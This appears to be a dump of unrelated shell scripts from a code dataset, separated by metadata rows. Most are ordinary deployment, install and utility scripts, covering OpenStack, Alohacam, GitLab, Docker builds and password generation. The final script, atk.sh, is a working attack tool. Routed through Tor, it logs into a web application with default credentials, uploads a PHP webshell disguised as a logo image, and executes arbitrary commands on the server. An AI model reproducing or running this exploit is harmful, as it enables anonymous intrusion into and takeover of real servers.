for ip in $(hostname --ip-address || hostname -i) $(ip addr | awk "/$(ip route | grep "^default" | head -n1 | awk '{ print $5 }')\$/ { sub(/\/[0-9]*/, \"\","' $2); print $2}'); do
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ && $NO_PROXY != *"$ip"* ]]; then
echo "The $ip IP address is not defined in NO_PROXY env"
exit 1
fi
done
fi
echo "Sync server's clock"
# Use google.com's HTTP Date header as a poor-man's time source.
sudo date -s "$(wget -qSO- --max-redirect=0 google.com 2>&1 | grep Date: | cut -d' ' -f5-8)Z"
# Configuring KRD project
krd_folder="${KRD_FOLDER:-/opt/krd}"
if [ ! -d "$krd_folder" ]; then
echo "Cloning and configuring KRD project..."
sudo -E git clone --depth 1 https://github.com/electrocucaracha/krd "$krd_folder"
sudo chown -R "$USER": "$krd_folder"
fi
cd "$krd_folder" || exit
# For k8s actions, set up SSH keys and a single-node kubespray inventory
# pointing at this very host.
if [[ $krd_actions_list == *k8s* ]]; then
# Setup SSH keys
rm -f ~/.ssh/id_rsa*
sudo mkdir -p /root/.ssh/
echo -e "\n\n\n" | ssh-keygen -t rsa -N ""
if [ "$EUID" -ne "0" ]; then
# Attempt to copy file when non root else cmd fails with 'same file' message
sudo cp ~/.ssh/id_rsa /root/.ssh/id_rsa
fi
tee <~/.ssh/id_rsa.pub --append ~/.ssh/authorized_keys | sudo tee --append /root/.ssh/authorized_keys
chmod og-wx ~/.ssh/authorized_keys
hostname=$(hostname)
ip_address=$(hostname -I | awk '{print $1}')
sudo tee inventory/hosts.ini <<EOL
[all]
$hostname
[kube-master]
$hostname ansible_host=$ip_address ip=$ip_address
[kube-node]
$hostname ansible_host=$ip_address ip=$ip_address
[etcd]
$hostname ansible_host=$ip_address ip=$ip_address
[k8s-cluster:children]
kube-node
kube-master
EOL
fi
sudo -E ./node.sh
# Resolving Docker previous installation issues
if [ "${KRD_CONTAINER_RUNTIME:-docker}" == "docker" ] && command -v docker; then
echo "Removing docker previous installation"
# shellcheck disable=SC1091
source /etc/os-release || source /usr/lib/os-release
case ${ID,,} in
ubuntu | debian)
systemctl --all --type service | grep -q docker && sudo systemctl stop docker --now
sudo apt-get purge -y docker-ce docker-ce-cli moby-engine moby-cli moby-buildx || true
sudo rm -rf /var/lib/docker /etc/docker
sudo rm -rf /var/run/docker.sock
sudo rm -f "$(sudo netstat -npl | grep docker | awk '{print $NF}')"
;;
esac
fi
echo "Deploying KRD project"
# Run each requested action (comma-separated list), teeing its log.
for krd_action in ${krd_actions_list//,/ }; do
./krd_command.sh -a "$krd_action" | tee "krd_${krd_action}.log"
done
if [ -f /etc/apt/sources.list.d/docker.list ] && [ -f /etc/apt/sources.list.d/download_docker_com_linux_ubuntu.list ]; then
sudo rm /etc/apt/sources.list.d/docker.list
fi
| true |
2c34f459032f669bc066b2b615d5781f30308566 | Shell | lqhorochi/trojan-wiz | /test_menu.sh | UTF-8 | 348 | 2.953125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Demo of a whiptail --menu dialog.
a=$(which g++zz)
# NOTE(review): the "$a :-" arguments below look like leftover
# experimentation — $a is almost certainly empty (g++zz is not a real
# command) and ":-" then becomes a stray tag/item pair; confirm the
# intended menu entries.
OPTION=$(whiptail --title "Menu Dialog" --menu "Choose your favorite programming language." 15 60 6 \
"1" "Python" \
$a :- "2" "Java" \
"3" "C" \
"4" "PHP" 3>&1 1>&2 2>&3)
# whiptail writes the selected tag to fd 3 (swapped with stderr above);
# a non-zero exit status means the dialog was cancelled.
exitstatus=$?
if [ $exitstatus = 0 ]; then
echo "Your favorite programming language is:" $OPTION
else
echo "You chose Cancel."
fi
b25410dd566128c23f52ea46a6371715f6abbac5 | Shell | benaux/bkb-env | /toolsfiles/utils/cogo | UTF-8 | 179 | 3.140625 | 3 | [] | no_license | #!/bin/sh
# Point the "co" tmux session's active pane at a directory: the first
# argument when given, otherwise the caller's current working directory.
if tmux has-session -t co; then
  if [ -n "$1" ] ; then
    tmux send-keys -t co "cd $1" Enter
  else
    cwd=$(pwd)
    tmux send-keys -t co "cd $cwd" Enter
  fi
fi
| true |
7c07b5fe58f9164ce7046f151b303a822df26743 | Shell | nlouwere1/cloud-tools | /build-tenant.sh | UTF-8 | 3,547 | 2.90625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#set -x
# build-tenant.sh — (re)create a two-node OpenStack tenant lab:
#   aio<ID>     : all-in-one node  (flavor os.large)
#   compute<ID> : compute node     (flavor os.medium)
# Usage: build-tenant.sh [aio_id] [compute_id] [aio_host_n] [compute_host_n]
# Load admin credentials unless they are already in the environment.
if [ ! "${OS_PASSWORD}" ]; then
source ~/keystonerc_admin
fi
# Last octet of each VM's address, plus the hypervisor numbers to pin to.
aio_id=${1:-'231'}
compute_id=${2:-'241'}
an=${3:-'1'}
cn=${4:-'2'}
echo aio = ${aio_id}:${an} compute = ${compute_id}:${cn}
# Tear down any previous instances with these names before rebuilding.
nova delete aio${aio_id} compute${compute_id}
sleep 5
# First-boot user-data script for the AIO node (passed via --user-data
# below). The outer heredoc delimiter EOD is unquoted, so ${aio_id} and
# ${compute_id} are substituted *now*; the nested EOF heredocs are plain
# text inside the generated script.
cat > /tmp/aio-init.sh <<EOD
#!/bin/bash
passwd centos <<EOF
centos
centos
EOF
passwd root <<EOF
root
root
EOF
sed -e 's/^.*ssh-rsa/ssh-rsa/' -i /root/.ssh/authorized_keys
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<EOF
DEVICE=eth0
BOOTPROTO=static
ONBOOT=yes
DNS1=10.1.1.92
DOMAIN=onecloud
IPADDR=10.1.64.${aio_id}
PREFIX=24
GATEWAY=10.1.64.1
DEFROUTE=YES
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth1 <<EOF
DEVICE=eth1
BOOTPROTO=static
ONBOOT=yes
IPADDR=10.1.65.${aio_id}
PREFIX=24
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth2 <<EOF
DEVICE=eth2
BOOTPROTO=static
ONBOOT=yes
MTU=1400
EOF
cat > /etc/resolv.conf <<EOF
nameserver 10.1.1.92
search onecloud
EOF
cat >> /etc/hosts <<EOF
10.1.64.${aio_id} aio${aio_id}.onecloud aio${aio_id}
10.1.64.${compute_id} compute${compute_id}.onecloud compute${compute_id}
10.1.64.1 gw.onecloud gw
EOF
cat >> /etc/hostname <<EOF
aio${aio_id}
EOF
hostname aio${aio_id}
ifdown eth0; ifup eth0; ifdown eth1; ifup eth1; ifdown eth2; ifup eth2
umount /mnt
sed -e '/vdb/d ' -i /etc/fstab
yum update -y
yum install bind-utils screen vim -y
EOD
# Same first-boot script for the compute node (different IPs/hostname).
cat > /tmp/compute-init.sh <<EOD
#!/bin/bash
passwd centos <<EOF
centos
centos
EOF
passwd root <<EOF
root
root
EOF
sed -e 's/^.*ssh-rsa/ssh-rsa/' -i /root/.ssh/authorized_keys
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<EOF
DEVICE=eth0
BOOTPROTO=static
ONBOOT=yes
DNS1=10.1.1.92
DOMAIN=onecloud
IPADDR=10.1.64.${compute_id}
PREFIX=24
GATEWAY=10.1.64.1
DEFROUTE=YES
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth1 <<EOF
DEVICE=eth1
BOOTPROTO=static
ONBOOT=yes
IPADDR=10.1.65.${compute_id}
PREFIX=24
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth2 <<EOF
DEVICE=eth2
BOOTPROTO=static
ONBOOT=yes
MTU=1400
EOF
cat > /etc/resolv.conf <<EOF
nameserver 10.1.1.92
search onecloud
EOF
cat >> /etc/hosts <<EOF
10.1.64.${aio_id} aio${aio_id}.onecloud aio${aio_id}
10.1.64.${compute_id} compute${compute_id}.onecloud compute${compute_id}
10.1.64.1 gw.onecloud gw
EOF
cat >> /etc/hostname <<EOF
compute${compute_id}
EOF
hostname compute${compute_id}
ifdown eth0; ifup eth0; ifdown eth1; ifup eth1; ifdown eth2; ifup eth2
umount /mnt
sed -e '/vdb/d' -i /etc/fstab
yum update -y
yum install bind-utils screen vim emacs -y
EOD
# Resolve network and image UUIDs by name.
sixtyfour=`neutron net-list | awk '/ sixtyfour / {print $2}'`
sixtyfive=`neutron net-list | awk '/ sixtyfive / {print $2}'`
flat=`neutron net-list | awk '/ flat / {print $2}'`
image=`glance image-list | awk '/ centos7 / {print $2}'`
# Only eth0 on VLAN 64 and eth1 on VLAN 65
nova boot --image ${image} --flavor os.large --nic net-id=${sixtyfour},v4-fixed-ip=10.1.64.${aio_id} \
--nic net-id=${sixtyfive},v4-fixed-ip=10.1.65.${aio_id} --nic net-id=${flat} --config-drive True \
--user-data /tmp/aio-init.sh --availability-zone nova:centos-${an}.onecloudinc.com --key-name class aio${aio_id}
nova boot --image ${image} --flavor os.medium --nic net-id=${sixtyfour},v4-fixed-ip=10.1.64.${compute_id} \
--nic net-id=${sixtyfive},v4-fixed-ip=10.1.65.${compute_id} --nic net-id=${flat} --config-drive True \
--user-data /tmp/compute-init.sh --availability-zone nova:centos-${cn}.onecloudinc.com --key-name class compute${compute_id}
# Show the console endpoints for both new instances.
echo "aio VNC"
vnc aio${aio_id}
echo "compute VNC"
vnc compute${compute_id}
| true |
43428506b314351c74f7defd5ce92bee7743bbe2 | Shell | jpstruhar/alohacam | /install.sh | UTF-8 | 3,288 | 4.1875 | 4 | [] | no_license | #!/bin/bash -e
# Alohacam installer: download the binary, provision a device key +
# certificate via an activation token, and enable the Raspberry Pi camera
# stack. PLAT/ARCH/TOKEN/SKIP_DOWNLOAD may be pre-set in the environment.
# Check for dependencies.
# `hash` fails (and, via the -e shebang, aborts) if any tool is missing.
hash curl grep openssl
DASHBOARD_URL=https://alohacam.io
API_URL=https://api.alohacam.io
DOWNLOAD_URL=http://get.alohacam.io
VERSION=latest
KEYFILE=key.pem
CERTFILE=cert.pem
CSRFILE=req.pem
REBOOT_REQUIRED=false
# Optional local overrides — presumably dev settings; TODO confirm contents.
[ -e lanikai.env ] && source lanikai.env
# Identify platform and architecture.
if [ -z "$PLAT" ]; then
    case "$OSTYPE" in
        linux*)
            PLAT=linux ;;
        *)
            echo "Unsupported platform: $OSTYPE"
            exit 1 ;;
    esac
fi
if [ -z "$ARCH" ]; then
    case "$(uname -m)" in
        armv6*)
            ARCH=armv6 ;;
        armv7*)
            ARCH=armv7 ;;
        aarch64*)
            ARCH=aarch64 ;;
        *)
            echo "Unsupported architecture: $(uname -m)"
            exit 1 ;;
    esac
fi
# Download latest alohacam binary.
if [ -z "$SKIP_DOWNLOAD" ]; then
    curl -L -o alohacam $DOWNLOAD_URL/release/$VERSION/alohacam-$PLAT-$ARCH
    chmod a+x alohacam
fi
# Install rng-tools to ensure have sufficient entropy for certificates
if [ ! -e /usr/sbin/rngd ]; then
    echo "Installing rng-tools to ensure sufficient entropy for generating"
    echo "certificates (requires sudo)."
    sudo apt-get install -y rng-tools
fi
# Generate a private key, if we don't already have one.
# A fresh key invalidates any old certificate, so that is removed too.
if [ ! -e $KEYFILE ]; then
    echo "Generating private key"
    openssl ecparam -name prime256v1 -genkey -out $KEYFILE
    rm -f $CERTFILE
fi
# Request a certificate, if we don't already have one.
if [ ! -e $CERTFILE ]; then
    if [ -z "$TOKEN" ]; then
        echo "Visit the Alohacam dashboard to obtain an activation token for this device:"
        echo "    $DASHBOARD_URL/devices/"
        # Keep prompting until a non-empty, alphanumeric-only token is given
        # (tr -cd strips everything else from $REPLY).
        while [ -z "$TOKEN" ]; do
            read -r -p "Enter activation token: "
            TOKEN=$(echo "$REPLY" | tr -cd '0-9A-Za-z')
        done
    fi
    # Generate a certificate signing request. The activation token is included as
    # the Subject Common Name.
    openssl req -new -key $KEYFILE -subj "/CN=Activation:$TOKEN" -out $CSRFILE
    # Submit CSR with activation request. If successful, we'll receive a PEM-encoded
    # certificate in response.
    if curl -fsSL -F "csr=<$CSRFILE" -o $CERTFILE "$API_URL/activate-device/$TOKEN"; then
        echo "Success. You may now run Alohacam."
        rm -f $CSRFILE
    else
        echo "Unable to activate your device."
        echo "Try requesting a new activation code."
    fi
fi
# Load v4l2 driver on boot (if not already enabled).
if ! grep -q "^bcm2835-v4l2$" /etc/modules; then
    echo "Modifying /etc/modules to enable camera driver (requires sudo)"
    sudo sh -c 'echo "bcm2835-v4l2" >> /etc/modules'
fi
if ! lsmod | grep -q "^bcm2835_v4l2"; then
    echo "Loading camera driver (requires sudo)"
    sudo modprobe bcm2835-v4l2
fi
# Ensure Raspberry Pi bootloader configured to enable camera.
if ! grep -q "^start_x=1$" /boot/config.txt; then
    echo "Modifying /boot/config.txt to enable camera (requires sudo)"
    sudo sh -c 'echo "start_x=1" >> /boot/config.txt'
    REBOOT_REQUIRED=true
fi
# Reboot prompt. ($REBOOT_REQUIRED expands to the command true/false.)
if $REBOOT_REQUIRED; then
    echo "Some changes require you to reboot your Raspberry Pi."
    read -p "Reboot now (y/N)? " yesno
    case $yesno in
        [Yy]* ) sudo reboot;
    esac
else
    ./alohacam
fi
| true |
e05d20c9076c487ee1c2b7fcbc97cdfda4e7eff3 | Shell | Lepidopterist/generic | /overlay/hooks/supervisord-pre.d/99_config_check.sh | UTF-8 | 195 | 2.6875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
set -e
echo "Currently configured config:"
/scripts/getconfig.sh /etc/nginx/nginx.conf
echo "Checking nginx config"
/usr/sbin/nginx -t
# Under `set -e` a failing `nginx -t` aborts the script above, so reaching
# this line always means the check passed. The old
# `[ $? -ne 0 ] || echo ...` re-tested a status that could only be 0.
echo "Config check successful"
| true |
5a713c522b144984510fa1469eebe9708962d5e8 | Shell | hugocortes/me | /deploy.sh | UTF-8 | 368 | 2.5625 | 3 | [] | no_license | #!/bin/bash
# Build and publish the hugocortes/me images to Docker Hub.
# Requires DOCKER_USERNAME / DOCKER_PASSWORD (and TRAVIS_COMMIT on CI).
DOCKER_HUB=hugocortes/me
# Timestamp component of the immutable release tag.
DATE=$(date +"%Y%m%d-%H%M")
# --password-stdin keeps the password out of the process list.
echo "$DOCKER_PASSWORD" | docker login -u "$DOCKER_USERNAME" --password-stdin
docker build -t $DOCKER_HUB:latest .
# Tag the same image as release-<timestamp>-<short commit sha>.
docker tag $DOCKER_HUB:latest $DOCKER_HUB:release-$DATE-${TRAVIS_COMMIT:0:8}
# Development flavour built against the dev base URL.
docker build --build-arg baseURL=https://dev.hugocortes.dev -t $DOCKER_HUB:devel .
# Pushes every local tag of the repository.
docker push $DOCKER_HUB
| true |
bef60a84c5c2c522dd3f1626372b790dcbd46b7a | Shell | JASHDO/ricogentoo | /app-backup/bacula/files/randpass-1.37.40 | UTF-8 | 677 | 3.5625 | 4 | [] | no_license | #! /bin/sh
#
# Generate a random password, written to standard output
# By John Walker
#
# Usage: randpass [length]   (default 48 characters)
if test "x$1" = "x" ; then
PWL=48 # Password length in characters
else
PWL=$1
fi
# Build a throw-away bc(1) program file; fall back to a PID-based name in
# /tmp when mktemp produces nothing.
tmp=`mktemp randpass.XXXXXXXXXX`
if test x$tmp = x; then
tmp=/tmp/p.tmp.$$
if test -f $tmp; then
echo "Temp file security problem on: $tmp"
exit 1
fi
fi
# Start from the helper bc library, then seed variable k from system state
# (process list, current time, /tmp listing) stripped down to digits.
cp autoconf/randpass.bc $tmp
ps | sum | tr -d ':[:alpha:] ' | sed 's/^/k=/' >>$tmp
date | tr -d ':[:alpha:] ' | sed 's/^/k=k*/' >>$tmp
ls -l /tmp | sum | tr -d ':[:alpha:] ' | sed 's/^/k=k*/' >>$tmp
# s() and r() come from autoconf/randpass.bc (not shown here) — presumably
# seed-and-draw routines; randpass.awk formats the output. NOTE(review):
# these entropy sources are predictable; fine for generated configs, not
# for high-value secrets.
echo "j=s(k); for (i = 0; i < $PWL; i++) r()" >>$tmp
echo "quit" >>$tmp
bc $tmp | awk -f autoconf/randpass.awk
rm $tmp
| true |
fea326bbf48e631185a0e833b193464785a199a3 | Shell | galoscar07/college2k16-2k19 | /2nd Semester/Operating Systems/Operating Systems for the exam/Problems/Shell/11.sh | UTF-8 | 261 | 2.875 | 3 | [] | no_license | #! /bin/sh
# Scrie un script shell care citeste stringuri de la tastatura pana cand
# se introduc 3 nume de fisiere
# (Read strings from the keyboard until 3 of them name existing files.)
#
# The previous nested-if version only terminated on three *consecutive*
# file names and looped forever at end-of-input; count matches instead.
count=0
while [ "$count" -lt 3 ]; do
    # Stop with a failure status if input runs out before 3 files are seen.
    read -r x || exit 1
    # Quote the answer so names containing spaces are tested as one word.
    if [ -f "$x" ]; then
        count=$((count + 1))
    fi
done
| true |
190a5d387ce691f989140fbbf90b8123c9cc09b5 | Shell | xsub/accepted | /scripts/compile.sh | UTF-8 | 530 | 3.171875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Build "accepted" into a throw-away prefix for local testing.
# With -d, debug code is compiled in and a separate debug prefix is used;
# the non-debug path is what put.sh exercises before committing.
if [ "$1" = "-d" ]; then
    prefix_opt='--prefix=/tmp/accepted-test-debug/'
    cpp_flags='CPPFLAGS=-DDEBUG_ON=1'
else
    prefix_opt='--prefix=/tmp/accepted-test'
    cpp_flags='CPPFLAGS=-DDEBUG_ON=0'
fi
# Wipe whatever a previous run built/installed in this location.
make clean
make uninstall
# Regenerate the autotools build system, configure, build and install.
autoreconf --install
./configure "$prefix_opt" "$cpp_flags"
make install
| true |
65852a293859fbde78dedf32257ff0c34bbce088 | Shell | mhdzumair/ResolvoPro | /download_captcha.sh | UTF-8 | 907 | 4.03125 | 4 | [] | no_license | #!/bin/bash
# Bulk-download captcha images for dataset building, resuming numbering
# from any images already present and throttling to avoid rate limits.
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
url=$1
dir=$2
downloads=$3
images=0        # images fetched since the last cool-down pause
delay=30        # seconds to sleep after every 30 downloads
# All three positional parameters are mandatory. (Quoted tests — the old
# unquoted [ -z $url ] form misbehaved on values with spaces — and the
# usage error now exits non-zero instead of 0.)
if [ -z "$url" ] || [ -z "$dir" ] || [ -z "$downloads" ];
then
    echo -e "${RED}Invalid Parameters ${NC}"
    echo -e "${GREEN}\nUsage:${NC}\n\t./download_captcha.sh captcha_curl_url image_directory numbers_of_downloads\n"
    exit 1
fi
# Resume numbering after any images already in the directory.
if [ -d "$dir" ];
then
    count=$(ls "$dir" | wc -l)
    echo "$count images found"
    ((count++))
else
    echo "create new directory"
    mkdir "$dir"
    count=1
fi
# Convert the requested amount into an absolute final index.
((downloads += count - 1))
while [ "$count" -le "$downloads" ]
do
    # Pause periodically so the server does not rate-limit or ban us.
    if [ "$images" -eq 30 ];
    then
        echo "sleep $delay s"
        sleep "$delay"
        images=0
    fi
    echo "downloading $count.png ..."
    curl "$url" --output "$dir/$count.png" --no-progress-meter --no-keepalive --tcp-fastopen
    # Throttle large batches a little between individual requests as well.
    if [ "$downloads" -gt 20 ];
    then
        sleep 5
    fi
    ((count++))
    ((images++))
done
exit
| true |
d0222ccb9d898d06ffd8e08bfdfc6ab9db2143f1 | Shell | couchbase/build-tools | /dockerhub/scripts/weekly-docker-build | UTF-8 | 1,640 | 3.984375 | 4 | [] | no_license | #!/bin/bash -e
# Scan all products/releases/versions via the build database API and emit a
# *.properties trigger file for every build completed in the last week.
script_dir=$(dirname $(readlink -e -- "${BASH_SOURCE}"))
build_tools_dir=$(git -C "${script_dir}" rev-parse --show-toplevel)
# Provides status(), dbapi(), dbapi_builds/releases/versions used below.
source ${build_tools_dir}/utilities/shell-utils.sh
min_timestamp=$(date +%s -d "1 week ago")
# Given a product/release/version, determine whether the most recent build
# number is less than one week old. If so, trigger Docker build.
function check_needed() {
    product=$1
    release=$2
    version=$3
    status "${product} ${release} ${version}"
    if [[ "${product}" == "couchbase-server" && "${release}" == "master" ]]; then
        status "... skipping branch-master builds"
        return 0
    fi
    latest=$(dbapi_builds ${product} ${release} ${version} last_complete)
    if [[ ${latest} == 0 ]]; then
        status "... last build not known; skipping"
        return 0
    fi
    status ... latest build number is ${latest}
    timestamp=$(dbapi builds/${product}-${version}-${latest} | jq .timestamp)
    # NOTE(review): `>` inside [[ ]] is a *lexicographic* compare; it only
    # works here because both operands are equal-length epoch integers.
    # `-gt` (after stripping jq quoting) would state the intent — confirm.
    if [[ ${timestamp} > ${min_timestamp} ]]; then
        status "... Newer than 1 week old - will trigger build"
        # Docker Hub uses "sync-gateway" while the build DB uses
        # "sync_gateway"; translate the name for the properties file.
        if [[ "${product}" == "sync_gateway" ]]; then
            prodarg=sync-gateway
        else
            prodarg=${product}
        fi
        cat > ${prodarg}-${release}-${version}-dockerbuild.properties <<EOF
PRODUCT=${prodarg}
VERSION=${version}
BLD_NUM=${latest}
EOF
    fi
}
for product in couchbase-server sync_gateway; do
    for release in $(dbapi_releases ${product}); do
        for version in $(
            dbapi_versions ${product} ${release}
        ); do
            check_needed ${product} ${release} ${version}
        done
    done
done
| true |
894210e6ff6e2c3d1ce041d60763f5b4ae20aad2 | Shell | cugoracle/ops_doc_linux | /gitlab/gitlab-ce安装.sh | UTF-8 | 3,265 | 2.59375 | 3 | [] | no_license | centos7安装gitlab
1、安装依赖关系
# yum -y groupinstall 'Development Tools'
# yum install curl policycoreutils openssh-server openssh-clients postfix
2、关闭防火墙、SeLinux
# systemctl stop firewalld
# sed -i 's@SELINUX=enforcing@SELINUX=disabled@g' /etc/sysconfig/selinux
# firewall-cmd --permanent --add-service=http
# systemctl reload firewalld
# setenforce 0
3、下载安装gitlab package
# vim /etc/yum.repos.d/gitlab-ce.repo
[gitlab-ce]
name=Gitlab CE Repository
baseurl=https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el$releasever/
gpgcheck=0
enabled=1
# yum -y install gitlab-ce
脚本如果无法运行,可以直接下载下来
# wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-9.0.5-ce.0.el7.x86_64.rpm
# yum -y install gitlab-ce-9.0.5-ce.0.el7.x86_64.rpm
4、配置并启动gitlab
# gitlab-ctl reconfigure
# gitlab-ctl start
# firewall-cmd --permanent --zone=public --add-port=80/tcp
# vim /var/opt/gitlab/nginx/conf/gitlab-http.conf
server_name mail.bjwf125.com;
5、访问并设置密码
访问: http://mail.bjwf125.com #需要设置DNS,或者修改本机hosts文件
会提示你管理员账号密码重置
管理员用户名默认为root
6、可能遇到的问题
重新设置host
# rpm 安装 gitlab.yml 路径
# vi /var/opt/gitlab/gitlab-rails/etc/gitlab.yml
gitlab:
host: xxx.xxx.xx.xxx
7、一些坑
gitlabce的坑
#首先祭出gitlab强大的工具
gitlab-ctl tail; #查看当前服务器的日志,非常好用
gitlab-ctl reconfigure; #这个命令慎用 , 它会重新创建gitlab的代码, 然后你的gitlab就会恢复默认配置了(gitlab.yml)...
gitlab-ctl stop nginx; #停止对应的服务,由于我本机自己编译了个nginx , 所以我要吧gitlab自己打包的nginx干掉,不给启用.
#由于我自己的nginx是nobody身份启动,gitlab的目录是git账号的,然后坑爹的事情就来了 , 会出现很多权限报错:
connect() to unix:/data1/htdocs/gitlab.mmfei.com/tmp/sockets/gitlab.socket failed (2: No such file or directory)
connect() to unix:/var/opt/gitlab/gitlab-rails/sockets/gitlab.socket failed (13: Permission denied)
connect() to unix:/var/opt/gitlab/gitlab-git-http-server/socket failed (13: Permission denied)
#权限问题可以用下面的一刀切的方式解决 , 虽然不好 , 但是对于小白来说 , 已经够了
chmod 777 /usr/local/nginx.1.5.12/fastcgi_temp -R ;
chmod 777 /var/opt/gitlab/gitlab-rails/sockets;
chown git:git -R /opt/gitlab/embedded/service/gitlab-rails/public;
chmod 777 /var/opt/gitlab/gitlab-git-http-server/;
##一些收集的有意义的日志和目录.....
/opt/gitlab #holds application code for GitLab and its dependencies.
/var/opt/gitlab #holds application data and configuration files that gitlab-ctl reconfigure writes to.
/etc/gitlab #holds configuration files for omnibus-gitlab. These are the only files that you should ever have to edit manually.
/var/log/gitlab #contains all log data generated by components of omnibus-gitlab.
/var/log/gitlab/gitlab-rails/production.log;
/home/git/gitlab/config/gitlab.yml.example;
/home/git/gitlab/config/gitlab.yml;
/var/opt/gitlab/gitlab-rails/etc/gitlab.yml;
| true |
08531bc3c623b8f58215be4594cd6b3bd04b98d5 | Shell | SpringerPE/grafana-loki-boshrelease | /packages/loki/packaging | UTF-8 | 1,156 | 3.25 | 3 | [] | no_license | #!/usr/bin/env bash
set -e -x
# BOSH packaging script: compile the loki binary and install helpers into
# ${BOSH_INSTALL_TARGET}. Dependency packages (golang) live here:
BOSH_PACKAGES_DIR=${BOSH_PACKAGES_DIR:-/var/vcap/packages}
# Build
echo "Building and installing loki binaries ..."
mkdir -p ${BOSH_INSTALL_TARGET}/src
mkdir -p ${BOSH_INSTALL_TARGET}/bin
# The package sources become the GOPATH workspace for the build.
cp -a . ${BOSH_INSTALL_TARGET}/src
export GOPATH=${BOSH_INSTALL_TARGET}
export GOROOT=$(readlink -nf "${BOSH_PACKAGES_DIR}/golang")
export PATH=${GOROOT}/bin:${PATH}
# Go's build cache must live somewhere writable on the BOSH VM.
export GOCACHE=/var/vcap/data/tmp/go
mkdir -p ${GOCACHE}
pushd ${BOSH_INSTALL_TARGET}/src/github.com/grafana/loki
# Static (CGO-free, netgo) build; -s -w strips symbols and the -X flags
# stamp the vendored Prometheus version variables.
CGO_ENABLED=0 go build -ldflags "-s -w -X github.com/grafana/loki/vendor/github.com/prometheus/common/version.Branch=dev -X github.com/grafana/loki/vendor/github.com/prometheus/common/version.Version=0.3.0-BOSH -X github.com/grafana/loki/vendor/github.com/prometheus/common/version.Revision=0.3.0" -tags netgo -o ${BOSH_INSTALL_TARGET}/bin/loki ./cmd/loki/main.go
popd
# clean up source artifacts
rm -rf ${BOSH_INSTALL_TARGET}/src ${BOSH_INSTALL_TARGET}/pkg
# copy binaries
chmod a+x ${BOSH_INSTALL_TARGET}/bin/*
# Install shell helpers
echo "Adding shell helpers ..."
mkdir -p ${BOSH_INSTALL_TARGET}
cp -av bosh-helpers ${BOSH_INSTALL_TARGET}/
| true |
33d63a41ee70eae3bed5f0e73d8c548330b3d279 | Shell | red-hat-storage/ocs-workloads | /mix-fs-rbd/run-io.sh | UTF-8 | 340 | 2.875 | 3 | [] | no_license | pgsqlPrefix=$1
logLocation=$2
# Fan out background pgbench-style workloads, one per PostgreSQL pod.
# The brace range is currently a single pod; widen it to scale out.
for i in {1..1}; do
    echo "Running IO on $pgsqlPrefix-$i"
    echo "+++++++++++++++++++"
    echo " run-workload-pgsql.sh $pgsqlPrefix-$i "
    # Quote the pod name and log path so prefixes containing spaces or glob
    # characters cannot word-split or expand; nohup keeps the workload
    # running after this launcher exits.
    nohup sh run-workload-pgsql.sh "$pgsqlPrefix-$i" >"$logLocation/$pgsqlPrefix-$i.log" &
    echo "IO started in $pgsqlPrefix-$i "
    echo "____________________________"
    # Stagger launches slightly to avoid a thundering herd.
    sleep 5
done
| true |
c38dd9a27f2b45739acfe67f886ccb06653fd1f4 | Shell | Kaveesha-Induwara/skija | /ci/deploy_linux.sh | UTF-8 | 391 | 2.78125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Publish the skija-linux artifact: stamp the native pom with the computed
# revision, then deploy (untouched mvn line below) with Space credentials.
set -o errexit -o nounset -o pipefail
# Run from the repository root.
cd "`dirname $0`/.."
REVISION=$(./ci/revision.sh)
echo "Deploying skija-linux v${REVISION}"
cd native
echo $REVISION > build/skija.version
# Rewrite the generic skija-native pom into a versioned linux-specific one.
sed -i -e "s/0.0.0-SNAPSHOT/$REVISION/g" -e "s/skija-native/skija-linux/g" pom.xml
mvn --batch-mode --settings ../ci/settings.xml -Dspace.username=Nikita.Prokopov -Dspace.password=${SPACE_TOKEN} deploy | true |
87ad52d97551ae60df02299c19f7759587989ecd | Shell | caileighf/MCC_DAQ | /start_collect | UTF-8 | 401 | 3.078125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Launch an MCC DAQ collection run driven by config.json.
CONFIG_FILE=$(cat $HOME/ACBOX/MCC_DAQ/config.json)
# Extract data_directory with jsawk, then archive a timestamped copy of the
# active config next to the data it will produce.
DATA_DIR=$( echo "$CONFIG_FILE" | jsawk 'return this.data_directory' )\
&& cp "$HOME/ACBOX/MCC_DAQ/config.json" "${DATA_DIR}/SINGLE_config_$(date +"%s").json"
# Pull the raw "mode" key/value pair out of config.json; the CONTINUOUS
# check and script selection continue on the following (untouched) line.
MODE="$(grep -Po '\"mode\":.*?[^\\]\",' config.json)"\
&& echo $MODE | grep "CONTINUOUS" > /dev/null \
&& source run_single_continuous.sh || source run_single_triggered.sh | true |
69ab0222b8ef10d7b691836db7e7d0e4b6a05314 | Shell | Ug0Security/Fasttelpwn | /atk.sh | UTF-8 | 935 | 2.59375 | 3 | [] | no_license | # Ta gueule Vlad
echo "Log In with default user credentials"
cookie=$(timeout 10 torify curl -i -s -X POST "$1/index.php" --data "username=user&password=user&language=fr&LoginButton=Login" | grep "Set-Cookie" | grep -o -P '(?<=PHPSESSID=).*(?=;)')
echo "We should be logged, here the cookie : $cookie"
echo " "
echo "Let's upload a webshell"
timeout 10 torify curl -s --cookie "PHPSESSID=$cookie" -X POST "$1/admin/UploadWebsiteLogo.php" -F 'uploadImageFile=@logo-menu.php;type=image/png' -H 'Expect:' >/dev/null
echo " "
sleep 5
echo "Let's execute commands !!"
echo $2
echo "-------Command Output----------"
timeout 10 torify curl --cookie "PHPSESSID=$cookie" "$1/res/img/custom-logo-menu.php" --data-urlencode "cmd=$2"
echo "-------------------------------"
echo " "
echo "Cleaning..."
